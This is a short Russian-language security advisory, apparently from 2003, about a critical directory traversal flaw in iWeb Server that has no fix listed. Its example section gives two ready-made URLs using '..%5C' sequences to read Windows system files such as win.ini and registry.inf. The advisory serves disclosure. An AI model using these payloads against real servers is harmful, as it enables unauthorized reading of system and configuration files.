Просмотр произвольных файлов в iWeb Server

Дата публикации:
01.11.2003
Всего просмотров:
1112
Опасность:
Критическая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: iWeb Server

Описание: Уязвимость обнаружена в iWeb Server. Удаленный пользователь может просматривать произвольные файлы на системе.

Удаленный пользователь может использовать специально обработанный URL, содержащий символы обхода каталога '..%5C', чтобы просматривать произвольные файлы на системе, расположенные вне wwwroot каталога.

Пример/Эксплоит:

http://127.0.0.1/..%5C..%5C..%5C.. %5C..%5C..%5C/winnt/win.ini

http://127.0.0.1/..%5C..%5C..%5C..%5C..%5C..%5C/winnt/system32/registry.inf

URL производителя: http://www.ashleybrown.co.uk/iweb/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Directory Traversal Attacks on iWeb Web Server

или введите имя

CAPTCHA